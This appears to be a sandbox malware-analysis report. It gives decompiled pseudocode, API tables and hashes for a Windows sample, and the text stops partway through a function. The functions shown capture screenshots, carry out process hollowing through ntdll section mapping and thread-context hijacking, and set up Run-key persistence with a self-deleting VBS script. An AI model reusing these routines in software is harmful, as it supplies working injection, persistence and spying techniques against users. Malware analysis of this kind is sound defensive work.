                    				void* _t228;
                    				struct HDC__* _t232;
                    				struct tagBITMAPINFO* _t234;
                    				void* _t235;
                    				int _t241;
                    				struct HDC__* _t243;
                    
                    				_t225 = __edx;
                    				_v149 = __edx;
                    				_t194 = __ecx;
                    				_t232 = CreateDCA("DISPLAY", 0, 0, 0);
                    				_v172.ptScreenPos = _t232;
                    				_t243 = CreateCompatibleDC(_t232);
                    				_t109 = E00418DBA(_v16);
                    				_v176 = _t109;
                    				_t227 = _t225;
                    				_v172.flags = _t227;
                    				if(_t109 == 0 || _t227 == 0) {
                    					_t109 = E00418DFC( *((intOrPtr*)((_v16 << 4) + 0x471d98)));
                    					_t227 = _t225;
                    					_v176 = _t109;
                    					_v172.flags = _t227;
                    				}
                    				if(_t109 == 0 || _t227 == 0) {
                    					L8:
                    					E00402093(_t194, _t194, _t225, _t243, 0x465094);
                    					goto L9;
                    				} else {
                    					_t225 =  &(_v172.ptScreenPos);
                    					_v172.ptScreenPos = _v172.ptScreenPos & 0x00000000;
                    					_v156 = _v156 & 0x00000000;
                    					E00418E32( *((intOrPtr*)((_v16 << 4) + 0x471d98)),  &(_v172.ptScreenPos));
                    					_t228 = CreateCompatibleBitmap(_t232, _v176, _t227);
                    					_v172.hCursor = _t228;
                    					if(_t228 != 0) {
                    						_t116 = SelectObject(_t243, _t228);
                    						__eflags = _t116;
                    						if(_t116 != 0) {
                    							_t118 = StretchBlt(_t243, 0, 0, _v196, _v188, _t232, _v180, _v176, _v196, _v188, 0xcc0020);
                    							__eflags = _t118;
                    							if(_t118 == 0) {
                    								goto L11;
                    							}
                    							__eflags = _v233;
                    							if(_v233 != 0) {
                    								_v172.cbSize = 0x14;
                    								_t186 = GetCursorInfo( &_v172);
                    								__eflags = _t186;
                    								if(_t186 != 0) {
                    									_t188 = GetIconInfo(_v172.hCursor,  &_v128);
                    									__eflags = _t188;
                    									if(_t188 != 0) {
                    										_t241 = _v156 - _v128.yHotspot - _v220;
                    										__eflags = _t241;
                    										DeleteObject(_v128.hbmColor);
                    										DeleteObject(_v128.yHotspot);
                    										DrawIcon(_t243, _v172.ptScreenPos - _v128.xHotspot - _v224, _t241, _v172);
                    										_t228 = _v224;
                    										_t232 = _v236;
                    									}
                    								}
                    							}
                    							__eflags = _v76;
                    							if(_v76 != 0) {
                    								_t181 =  *0x472198;
                    								__eflags = _t181;
                    								if(_t181 == 0) {
                    									 *0x472198 = _t243;
                    									 *_v72 = 1;
                    								} else {
                    									BitBlt(_t243, 0, 0, _v240, _v232, _t181, 0, 0, 0x660046);
                    									 *_v108 = 0;
                    								}
                    							}
                    							_push( &_v152);
                    							_t123 = 0x18;
                    							_t124 = GetObjectA(_t228, _t123, ??);
                    							__eflags = _t124;
                    							if(_t124 == 0) {
                    								goto L11;
                    							} else {
                    								_t226 = _v146 * _v148 & 0x0000ffff;
                    								__eflags = _t226 - 1;
                    								if(_t226 != 1) {
                    									_push(4);
                    									_pop(1);
                    									_v252 = 1;
                    									__eflags = _t226 - 1;
                    									if(_t226 <= 1) {
                    										L32:
                    										__eflags = 1 << 1;
                    										_push(0x2eb6edc);
                    										L33:
                    										_t234 = LocalAlloc(0x40, ??);
                    										_t204 = 0x18;
                    										_t234->bmiHeader = 0x28;
                    										_t234->bmiHeader.biWidth = _v172.ptScreenPos;
                    										_t234->bmiHeader.biHeight = _v156;
                    										_t234->bmiHeader.biPlanes = _v148;
                    										_t234->bmiHeader.biBitCount = _v146;
                    										_t136 = _v252;
                    										__eflags = _t136 - _t204;
                    										if(_t136 < _t204) {
                    											__eflags = 1;
                    											_t234->bmiHeader.biClrUsed = 1 << _t136;
                    										}
                    										_t234->bmiHeader.biCompression = _t234->bmiHeader.biCompression & 0x00000000;
                    										_t234->bmiHeader.biClrImportant = _t234->bmiHeader.biClrImportant & 0x00000000;
                    										asm("cdq");
                    										_t225 = _t226 & 0x00000007;
                    										_t142 = (_t234->bmiHeader.biWidth + 7 + (_t226 & 0x00000007) >> 3) * (_v252 & 0x0000ffff) * _t234->bmiHeader.biHeight;
                    										_t234->bmiHeader.biSizeImage = _t142;
                    										_t143 = GlobalAlloc(0, _t142);
                    										_v244 = _t143;
                    										__eflags = _t143;
                    										if(_t143 != 0) {
                    											__eflags = GetDIBits(_t243, _t228, 0, _t234->bmiHeader.biHeight & 0x0000ffff, _t143, _t234, 0);
                    											if(__eflags != 0) {
                    												_v252 = 0x4d42;
                    												_v250 = _t234->bmiHeader.biSizeImage + _t234->bmiHeader + _t234->bmiHeader.biClrUsed * 4 + 0xe;
                    												_v246 = 0;
                    												_v242 = _t234->bmiHeader + _t234->bmiHeader.biClrUsed * 4 + 0xe;
                    												E004020DF(_t194,  &_v236);
                    												E004020DF(_t194,  &_v148);
                    												E0040250A(_t194,  &_v236, _t225, __eflags,  &_v252, 0xe);
                    												L00403376( &_v244);
                    												E0040250A(_t194,  &_v248, _t225, __eflags, _t234, 0x28);
                    												L00403376( &_v256);
                    												_t235 = _v296;
                    												E0040250A(_t194,  &_v260, _t225, __eflags, _t235, _t234->bmiHeader.biSizeImage);
                    												L00403376( &_v268);
                    												DeleteObject(_t228);
                    												GlobalFree(_t235);
                    												DeleteDC(_v308);
                    												__eflags = _t243 -  *0x472198;
                    												if(__eflags != 0) {
                    													DeleteDC(_t243);
                    												}
                    												E00402055(_t194, _t194, _t243, __eflags,  &_v156);
                    												E00401FD8();
                    												E00401FD8();
                    												L9:
                    												return _t194;
                    											}
                    											DeleteDC(_v268);
                    											DeleteDC(_t243);
                    											DeleteObject(_t228);
                    											GlobalFree(_v284);
                    											goto L8;
                    										} else {
                    											DeleteDC(_v240);
                    											L12:
                    											DeleteDC(_t243);
                    											DeleteObject(_t228);
                    											goto L7;
                    										}
                    									}
                    									_push(8);
                    									_pop(1);
                    									_v252 = 1;
                    									__eflags = _t226 - 1;
                    									if(_t226 <= 1) {
                    										goto L32;
                    									}
                    									_push(0x10);
                    									_pop(1);
                    									_v252 = 1;
                    									__eflags = _t226 - 1;
                    									if(_t226 <= 1) {
                    										goto L32;
                    									}
                    									_t223 = 0x18;
                    									__eflags = _t226 - _t223;
                    									if(_t226 > _t223) {
                    										_push(0x20);
                    										_pop(1);
                    										L31:
                    										_v252 = 1;
                    										goto L32;
                    									}
                    									_v252 = _t223;
                    									_push(0x28);
                    									goto L33;
                    								}
                    								goto L31;
                    							}
                    						}
                    						L11:
                    						DeleteDC(_t232);
                    						goto L12;
                    					} else {
                    						DeleteDC(_t232);
                    						DeleteDC(_t243);
                    						DeleteObject(_t228);
                    						L7:
                    						goto L8;
                    					}
                    				}
                    			}




























































                    0x0041890b
                    0x00418917
                    0x00418923
                    0x0041892b
                    0x0041892e
                    0x0041893f
                    0x00418941
                    0x00418946
                    0x0041894a
                    0x0041894c
                    0x00418952
                    0x00418968
                    0x0041896d
                    0x0041896f
                    0x00418973
                    0x00418973
                    0x00418979
                    0x004189cb
                    0x004189d2
                    0x00000000
                    0x0041897f
                    0x00418986
                    0x0041898a
                    0x0041898f
                    0x0041899d
                    0x004189ae
                    0x004189b0
                    0x004189b6
                    0x004189e6
                    0x004189ec
                    0x004189ee
                    0x00418a1e
                    0x00418a24
                    0x00418a26
                    0x00000000
                    0x00000000
                    0x00418a28
                    0x00418a2d
                    0x00418a33
                    0x00418a3c
                    0x00418a42
                    0x00418a44
                    0x00418a52
                    0x00418a58
                    0x00418a5a
                    0x00418a7d
                    0x00418a7d
                    0x00418a81
                    0x00418a8e
                    0x00418a9b
                    0x00418aa1
                    0x00418aa5
                    0x00418aa5
                    0x00418a5a
                    0x00418a44
                    0x00418aa9
                    0x00418ab1
                    0x00418ab3
                    0x00418ab8
                    0x00418aba
                    0x00418aea
                    0x00418af0
                    0x00418abc
                    0x00418ad1
                    0x00418ade
                    0x00418ade
                    0x00418aba
                    0x00418af7
                    0x00418afa
                    0x00418afd
                    0x00418b03
                    0x00418b05
                    0x00000000
                    0x00418b0b
                    0x00418b14
                    0x00418b1a
                    0x00418b1d
                    0x00418b23
                    0x00418b25
                    0x00418b26
                    0x00418b2a
                    0x00418b2d
                    0x00418b5e
                    0x00418b5e
                    0x00418b67
                    0x00418b68
                    0x00418b70
                    0x00418b74
                    0x00418b75
                    0x00418b7f
                    0x00418b86
                    0x00418b8e
                    0x00418b97
                    0x00418b9b
                    0x00418b9f
                    0x00418ba2
                    0x00418ba9
                    0x00418bab
                    0x00418bab
                    0x00418bb8
                    0x00418bbc
                    0x00418bc0
                    0x00418bc1
                    0x00418bcf
                    0x00418bd6
                    0x00418bd9
                    0x00418bdf
                    0x00418be3
                    0x00418be5
                    0x00418c03
                    0x00418c05
                    0x00418c32
                    0x00418c47
                    0x00418c4d
                    0x00418c60
                    0x00418c64
                    0x00418c70
                    0x00418c80
                    0x00418c91
                    0x00418c9d
                    0x00418cae
                    0x00418cb6
                    0x00418cbf
                    0x00418cd0
                    0x00418cd6
                    0x00418cdd
                    0x00418ced
                    0x00418cef
                    0x00418cf5
                    0x00418cf8
                    0x00418cf8
                    0x00418d04
                    0x00418d10
                    0x00418d19
                    0x004189da
                    0x004189e3
                    0x004189e3
                    0x00418c11
                    0x00418c14
                    0x00418c17
                    0x00418c22
                    0x00000000
                    0x00418be7
                    0x004189f7
                    0x004189f1
                    0x004189fa
                    0x004189c5
                    0x00000000
                    0x004189c5
                    0x00418be5
                    0x00418b2f
                    0x00418b31
                    0x00418b32
                    0x00418b36
                    0x00418b39
                    0x00000000
                    0x00000000
                    0x00418b3b
                    0x00418b3d
                    0x00418b3e
                    0x00418b42
                    0x00418b45
                    0x00000000
                    0x00000000
                    0x00418b49
                    0x00418b4a
                    0x00418b4d
                    0x00418b57
                    0x00418b59
                    0x00418b5a
                    0x00418b5a
                    0x00000000
                    0x00418b5a
                    0x00418b4f
                    0x00418b53
                    0x00000000
                    0x00418b53
                    0x00000000
                    0x00418b1f
                    0x00418b05
                    0x004189f0
                    0x004189f7
                    0x00000000
                    0x004189b8
                    0x004189bf
                    0x004189c2
                    0x004189c5
                    0x004189c5
                    0x00000000
                    0x004189c5
                    0x004189b6

                    APIs
                    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418925
                    • CreateCompatibleDC.GDI32(00000000), ref: 00418932
                      • Part of subcall function 00418DBA: EnumDisplaySettingsW.USER32 ref: 00418DEA
                    • CreateCompatibleBitmap.GDI32(00000000,?), ref: 004189A8
                    • DeleteDC.GDI32(00000000), ref: 004189BF
                    • DeleteDC.GDI32(00000000), ref: 004189C2
                    • DeleteObject.GDI32(00000000), ref: 004189C5
                    • SelectObject.GDI32(00000000,00000000), ref: 004189E6
                    • DeleteDC.GDI32(00000000), ref: 004189F7
                    • DeleteDC.GDI32(00000000), ref: 004189FA
                    • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418A1E
                    • GetCursorInfo.USER32(?), ref: 00418A3C
                    • GetIconInfo.USER32(?,?), ref: 00418A52
                    • DeleteObject.GDI32(?), ref: 00418A81
                    • DeleteObject.GDI32(?), ref: 00418A8E
                    • DrawIcon.USER32 ref: 00418A9B
                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00418AD1
                    • GetObjectA.GDI32(00000000,00000018,?), ref: 00418AFD
                    • LocalAlloc.KERNEL32(00000040,00000001), ref: 00418B6A
                    • GlobalAlloc.KERNEL32(00000000,?), ref: 00418BD9
                    • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00418BFD
                    • DeleteDC.GDI32(?), ref: 00418C11
                    • DeleteDC.GDI32(00000000), ref: 00418C14
                    • DeleteObject.GDI32(00000000), ref: 00418C17
                    • GlobalFree.KERNEL32 ref: 00418C22
                    • DeleteObject.GDI32(00000000), ref: 00418CD6
                    • GlobalFree.KERNEL32 ref: 00418CDD
                    • DeleteDC.GDI32(?), ref: 00418CED
                    • DeleteDC.GDI32(00000000), ref: 00418CF8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                    • String ID: DISPLAY
                    • API String ID: 4256916514-865373369
                    • Opcode ID: d2b866e0b20f7a8933e3f5b2c0b0d85ca411696b86f0d74cf8853b70dbff91ba
                    • Instruction ID: 053d026a339f48e3657c41d21ad21f8f3af16a75de67182f84bf94aa78be3f0f
                    • Opcode Fuzzy Hash: d2b866e0b20f7a8933e3f5b2c0b0d85ca411696b86f0d74cf8853b70dbff91ba
                    • Instruction Fuzzy Hash: 01C15C715083409FD3209F25DC44B6BBBE9EF88751F00482EF589A3291DF74E945CB6A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 57%
                    			E00417B84(intOrPtr __ecx, void __edx) {
                    				void* __edi;
                    				_Unknown_base(*)()* _t81;
                    				int _t87;
                    				signed int _t110;
                    				int _t117;
                    				intOrPtr _t119;
                    				int _t122;
                    				long _t123;
                    				int _t128;
                    				void _t141;
                    				void* _t145;
                    				intOrPtr _t146;
                    				intOrPtr _t148;
                    				intOrPtr _t154;
                    				struct _PROCESS_INFORMATION* _t157;
                    				void _t158;
                    				intOrPtr _t160;
                    				intOrPtr* _t162;
                    				intOrPtr* _t164;
                    				int _t166;
                    				void* _t167;
                    				void* _t168;
                    
                    				_t164 = __edx;
                    				_t157 =  *(_t167 + 0x94);
                    				 *(_t167 + 0x34) = __edx;
                    				 *((intOrPtr*)(_t167 + 0x30)) = __ecx;
                    				 *((intOrPtr*)(_t167 + 0x1c)) = 0;
                    				while(1) {
                    					 *(_t167 + 0x34) = 0;
                    					 *(_t167 + 0x18) = 0;
                    					 *((intOrPtr*)(_t167 + 0x1c)) = 0;
                    					 *((intOrPtr*)(_t167 + 0x20)) = 0;
                    					 *0x471d90 = GetProcAddress(GetModuleHandleA("ntdll"), "ZwCreateSection");
                    					 *0x471d84 = GetProcAddress(GetModuleHandleA("ntdll"), "ZwMapViewOfSection");
                    					 *0x471d88 = GetProcAddress(GetModuleHandleA("ntdll"), "ZwUnmapViewOfSection");
                    					_t81 = GetProcAddress(GetModuleHandleA("ntdll"), "ZwClose");
                    					 *0x471d8c = _t81;
                    					if( *0x471d84 == 0 ||  *0x471d88 == 0 ||  *0x471d90 == 0 || _t81 == 0) {
                    						break;
                    					}
                    					_t160 = 0x44;
                    					E004368A0(_t157, _t167 + 0x4c, 0, _t160);
                    					_t168 = _t167 + 0xc;
                    					 *((intOrPtr*)(_t168 + 0x48)) = _t160;
                    					E004368A0(_t157, _t157, 0, 0x10);
                    					_t167 = _t168 + 0xc;
                    					if( *_t164 != 0x5a4d) {
                    						break;
                    					}
                    					_t162 =  *((intOrPtr*)(_t164 + 0x3c)) + _t164;
                    					if( *_t162 != 0x4550) {
                    						break;
                    					}
                    					_t87 =  *(_t162 + 0x50);
                    					 *(_t167 + 0x24) = _t87;
                    					 *(_t167 + 0x44) = _t87;
                    					 *((intOrPtr*)(_t167 + 0x48)) = 0;
                    					 *((intOrPtr*)(_t167 + 0x2c)) =  *((intOrPtr*)(_t162 + 0x34));
                    					if(CreateProcessW(0,  *(_t167 + 0x50), 0, 0, 0, 4, 0, 0, _t167 + 0x4c, _t157) == 0) {
                    						GetLastError();
                    						break;
                    					}
                    					_t145 = VirtualAlloc(0, 4, 0x1000, 4);
                    					 *(_t167 + 0x3c) = _t145;
                    					 *_t145 = 0x10007;
                    					if(GetThreadContext(_t157->hThread, _t145) == 0 || ReadProcessMemory(_t157->hProcess,  *((intOrPtr*)(_t145 + 0xa4)) + 8, _t167 + 0x34, 4, _t167 + 0x3c) == 0) {
                    						L32:
                    						VirtualFree(_t145, 0, 0x8000);
                    						 *0x471d88(GetCurrentProcess(), _t167 + 0x14);
                    						 *0x471d8c( *(_t167 + 0x18));
                    						TerminateProcess(_t157->hProcess, 0);
                    						break;
                    					} else {
                    						_push(0);
                    						_push(0x8000000);
                    						_push(0x40);
                    						_push(_t167 + 0x4c);
                    						_push(0);
                    						_push(0xf001f);
                    						_push(_t167 + 0x30);
                    						if( *0x471d90() != 0) {
                    							goto L32;
                    						}
                    						_t110 =  !( *(_t162 + 0x16) & 0x0000ffff) & 0x00000001;
                    						 *(_t167 + 0x24) = _t110;
                    						if(_t110 == 0) {
                    							_t141 =  *(_t167 + 0x28);
                    							 *(_t167 + 0x18) = _t141;
                    							 *0x471d88(_t157->hProcess, _t141);
                    						}
                    						_push(0x40);
                    						_push(0);
                    						_push(1);
                    						_push(_t167 + 0x24);
                    						_push(0);
                    						_push(0);
                    						_push(0);
                    						_push(_t167 + 0x2c);
                    						_push(_t157->hProcess);
                    						_push( *(_t167 + 0x3c));
                    						if( *0x471d84() == 0) {
                    							_t117 =  *0x471d84( *(_t167 + 0x3c), GetCurrentProcess(), _t167 + 0x30, 0, 0, 0, _t167 + 0x24, 1, 0, 0x40);
                    							__eflags = _t117;
                    							if(_t117 != 0) {
                    								goto L32;
                    							}
                    							__eflags =  *(_t167 + 0x24) - _t117;
                    							if( *(_t167 + 0x24) != _t117) {
                    								 *((intOrPtr*)(_t162 + 0x34)) =  *((intOrPtr*)(_t167 + 0x10));
                    							}
                    							E00436320( *((intOrPtr*)(_t167 + 0x1c)), _t164,  *((intOrPtr*)(_t162 + 0x54)));
                    							 *(_t167 + 0x3c) =  *(_t167 + 0x3c) & 0x00000000;
                    							_t119 =  *((intOrPtr*)(_t164 + 0x3c));
                    							_t167 = _t167 + 0xc;
                    							__eflags = 0 -  *(_t162 + 6);
                    							if(0 >=  *(_t162 + 6)) {
                    								L23:
                    								__eflags =  *(_t167 + 0x24);
                    								_t154 =  *((intOrPtr*)(_t167 + 0x10));
                    								if( *(_t167 + 0x24) != 0) {
                    									_t129 =  *(_t167 + 0x28);
                    									__eflags =  *(_t167 + 0x28) - _t154;
                    									if(__eflags != 0) {
                    										E00417F98( *((intOrPtr*)(_t167 + 0x1c)), __eflags, _t129, 0, _t154, 0);
                    										_t154 =  *((intOrPtr*)(_t167 + 0x20));
                    										_t167 = _t167 + 0x10;
                    									}
                    								}
                    								__eflags =  *((intOrPtr*)(_t167 + 0x2c)) - _t154;
                    								if( *((intOrPtr*)(_t167 + 0x2c)) == _t154) {
                    									L29:
                    									 *((intOrPtr*)(_t145 + 0xb0)) =  *((intOrPtr*)(_t162 + 0x28)) + _t154;
                    									_t122 = SetThreadContext(_t157->hThread, _t145);
                    									__eflags = _t122;
                    									if(_t122 == 0) {
                    										goto L32;
                    									}
                    									_t123 = ResumeThread(_t157->hThread);
                    									__eflags = _t123 - 0xffffffff;
                    									if(_t123 == 0xffffffff) {
                    										goto L32;
                    									}
                    									return 1;
                    								} else {
                    									_t128 = WriteProcessMemory(_t157->hProcess,  *((intOrPtr*)(_t145 + 0xa4)) + 8, _t167 + 0x18, 4, 0);
                    									__eflags = _t128;
                    									if(_t128 == 0) {
                    										goto L32;
                    									}
                    									_t154 =  *((intOrPtr*)(_t167 + 0x10));
                    									goto L29;
                    								}
                    							} else {
                    								_t158 =  *(_t167 + 0x34);
                    								_t146 =  *((intOrPtr*)(_t167 + 0x30));
                    								_t166 = _t164 + 0x10c + _t119;
                    								__eflags = _t166;
                    								do {
                    									E00436320( *((intOrPtr*)(_t166 - 8)) +  *((intOrPtr*)(_t167 + 0x1c)),  *_t166 + _t158,  *((intOrPtr*)(_t166 - 4)));
                    									_t166 = _t166 + 0x28;
                    									_t167 = _t167 + 0xc;
                    									_t146 = _t146 + 1;
                    									__eflags = _t146 - ( *(_t162 + 6) & 0x0000ffff);
                    								} while (_t146 < ( *(_t162 + 6) & 0x0000ffff));
                    								_t157 =  *(_t167 + 0x94);
                    								_t145 =  *(_t167 + 0x38);
                    								goto L23;
                    							}
                    						} else {
                    							VirtualFree(_t145, 0, 0x8000);
                    							 *0x471d8c( *(_t167 + 0x18));
                    							TerminateProcess( *_t157, 0);
                    							_t148 =  *((intOrPtr*)(_t167 + 0x1c)) + 1;
                    							_push(0);
                    							 *((intOrPtr*)(_t167 + 0x20)) = _t148;
                    							_pop(0);
                    							if(_t148 <= 0x64) {
                    								continue;
                    							}
                    							break;
                    						}
                    					}
                    				}
                    				return 0;
                    			}

























                    0x00417b9b
                    0x00417b9e
                    0x00417ba5
                    0x00417ba9
                    0x00417bad
                    0x00417bb1
                    0x00417bbb
                    0x00417bbf
                    0x00417bc3
                    0x00417bc7
                    0x00417bda
                    0x00417bee
                    0x00417c02
                    0x00417c0a
                    0x00417c13
                    0x00417c18
                    0x00000000
                    0x00000000
                    0x00417c42
                    0x00417c4c
                    0x00417c51
                    0x00417c54
                    0x00417c5c
                    0x00417c66
                    0x00417c6d
                    0x00000000
                    0x00000000
                    0x00417c76
                    0x00417c7e
                    0x00000000
                    0x00000000
                    0x00417c84
                    0x00417c88
                    0x00417c8c
                    0x00417c90
                    0x00417c97
                    0x00417cb4
                    0x00417f0f
                    0x00000000
                    0x00417f0f
                    0x00417cca
                    0x00417ccd
                    0x00417cd1
                    0x00417ce2
                    0x00417ed9
                    0x00417ee1
                    0x00417ef3
                    0x00417efd
                    0x00417f07
                    0x00000000
                    0x00417d0e
                    0x00417d0e
                    0x00417d10
                    0x00417d15
                    0x00417d1b
                    0x00417d1c
                    0x00417d1e
                    0x00417d27
                    0x00417d30
                    0x00000000
                    0x00000000
                    0x00417d3c
                    0x00417d3f
                    0x00417d43
                    0x00417d45
                    0x00417d4c
                    0x00417d50
                    0x00417d50
                    0x00417d56
                    0x00417d5e
                    0x00417d5f
                    0x00417d61
                    0x00417d62
                    0x00417d63
                    0x00417d64
                    0x00417d69
                    0x00417d6a
                    0x00417d6c
                    0x00417d78
                    0x00417de1
                    0x00417de7
                    0x00417de9
                    0x00000000
                    0x00000000
                    0x00417def
                    0x00417df3
                    0x00417df9
                    0x00417df9
                    0x00417e04
                    0x00417e09
                    0x00417e10
                    0x00417e13
                    0x00417e16
                    0x00417e1a
                    0x00417e5c
                    0x00417e5c
                    0x00417e61
                    0x00417e65
                    0x00417e67
                    0x00417e6b
                    0x00417e6d
                    0x00417e79
                    0x00417e7e
                    0x00417e82
                    0x00417e82
                    0x00417e6d
                    0x00417e85
                    0x00417e89
                    0x00417eae
                    0x00417eb4
                    0x00417ebd
                    0x00417ec3
                    0x00417ec5
                    0x00000000
                    0x00000000
                    0x00417eca
                    0x00417ed0
                    0x00417ed3
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00417e8b
                    0x00417ea0
                    0x00417ea6
                    0x00417ea8
                    0x00000000
                    0x00000000
                    0x00417eaa
                    0x00000000
                    0x00417eaa
                    0x00417e1c
                    0x00417e1c
                    0x00417e26
                    0x00417e2a
                    0x00417e2a
                    0x00417e2c
                    0x00417e3d
                    0x00417e46
                    0x00417e49
                    0x00417e4c
                    0x00417e4d
                    0x00417e4d
                    0x00417e51
                    0x00417e58
                    0x00000000
                    0x00417e58
                    0x00417d7a
                    0x00417d82
                    0x00417d8c
                    0x00417d96
                    0x00417da6
                    0x00417da7
                    0x00417da9
                    0x00417db6
                    0x00417db7
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00417dbd
                    0x00417d78
                    0x00417ce2
                    0x00000000

                    APIs
                    • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00417BCB
                    • GetProcAddress.KERNEL32(00000000), ref: 00417BCE
                    • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00417BDF
                    • GetProcAddress.KERNEL32(00000000), ref: 00417BE2
                    • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00417BF3
                    • GetProcAddress.KERNEL32(00000000), ref: 00417BF6
                    • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00417C07
                    • GetProcAddress.KERNEL32(00000000), ref: 00417C0A
                    • CreateProcessW.KERNEL32 ref: 00417CAC
                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417CC4
                    • GetThreadContext.KERNEL32(?,00000000), ref: 00417CDA
                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00417D00
                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417D82
                    • TerminateProcess.KERNEL32(?,00000000), ref: 00417D96
                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00417DD6
                    • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417EA0
                    • SetThreadContext.KERNEL32(?,00000000), ref: 00417EBD
                    • ResumeThread.KERNEL32(?), ref: 00417ECA
                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417EE1
                    • GetCurrentProcess.KERNEL32(?), ref: 00417EEC
                    • TerminateProcess.KERNEL32(?,00000000), ref: 00417F07
                    • GetLastError.KERNEL32 ref: 00417F0F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                    • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                    • API String ID: 4188446516-3035715614
                    • Opcode ID: 0f38c7a32eb100344ec972887011801d712df3eddd697eea22ea72fdc50f3c48
                    • Instruction ID: a2eeb4ce5538375c4ca1f5915bc938dd09d39026831ae314b0298e7a3d83e924
                    • Opcode Fuzzy Hash: 0f38c7a32eb100344ec972887011801d712df3eddd697eea22ea72fdc50f3c48
                    • Instruction Fuzzy Hash: EEA15CB0608305AFD7208F64DC85BAB7BF8EF48745F10482EF649D62A1DB74E884CB59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 98%
                    			E0040D229(void* __edx, void* _a4) {
                    				char _v0;
                    				short _v524;
                    				char _v548;
                    				void* _v560;
                    				char _v576;
                    				void* _v584;
                    				char _v596;
                    				char _v600;
                    				char _v612;
                    				char _v620;
                    				char _v624;
                    				char _v628;
                    				void* _v632;
                    				char _v644;
                    				char _v648;
                    				char _v652;
                    				void* _v656;
                    				char _v668;
                    				char _v672;
                    				char _v676;
                    				void* _v680;
                    				char _v692;
                    				void* _v696;
                    				char _v700;
                    				char _v704;
                    				char _v708;
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				void* _t53;
                    				void* _t54;
                    				void* _t57;
                    				signed int _t61;
                    				void* _t62;
                    				void* _t67;
                    				void* _t78;
                    				void* _t79;
                    				void* _t92;
                    				void* _t93;
                    				signed char _t134;
                    				void* _t214;
                    				void* _t245;
                    				void* _t247;
                    				void* _t248;
                    				void* _t249;
                    
                    				_t214 = __edx;
                    				E00412659();
                    				if( *0x474124 != 0) {
                    					E0040B721(0x4740d8);
                    				}
                    				_t245 =  *0x471d63 - 1; // 0x0
                    				if(_t245 == 0) {
                    					E00419529(_t214, _t245);
                    				}
                    				if( *0x471a85 != 0) {
                    					E0041BD26(E00401F04(0x473d4c), _t214);
                    				}
                    				_t231 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                    				_t247 =  *0x471b33 - 1; // 0x1
                    				if(_t247 == 0) {
                    					E004135D1(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", E00401F04(0x4742a8));
                    				}
                    				_t248 =  *0x471b30 - 1; // 0x0
                    				if(_t248 == 0) {
                    					E004135D1(0x80000002, _t231, E00401F04(0x4742a8));
                    				}
                    				_t249 =  *0x471b31 - 1; // 0x0
                    				if(_t249 == 0) {
                    					E004135D1(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", E00401F04(0x4742a8));
                    				}
                    				_t53 = E0040247C();
                    				_t54 = E00401FAB(0x474320);
                    				_t57 = E004132A6(E00401FAB(0x4742d8), "exepath",  &_v524, 0x208, _t54, _t53);
                    				_t250 = _t57;
                    				if(_t57 == 0) {
                    					GetModuleFileNameW(0,  &_v524, 0x208);
                    				}
                    				RegDeleteKeyA(0x80000001, E00401FAB(0x4742d8));
                    				_t61 = SetFileAttributesW( &_v524, 0x80);
                    				_t140 = 0x4742f0;
                    				asm("sbb bl, bl");
                    				_t134 =  ~_t61 & 0x00000001;
                    				_t62 = E004076DE(_t250);
                    				_t251 = _t62;
                    				if(_t62 != 0) {
                    					_t140 = 0x4742f0;
                    					SetFileAttributesW(E00401F04(0x4742f0), 0x80);
                    				}
                    				E00403014(_t134,  &_v600, E0040417E(_t134,  &_v668, 0x46b928, 0x46b928, E0043BA8F(_t134, _t140, _t251, L"Temp")), 0, 0x46b928, _t251, L"\\update.vbs");
                    				E00401F09();
                    				_t67 = E0040417E(_t134,  &_v672, _t64, 0x46b928, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n");
                    				_t218 = L"On Error Resume Next\n";
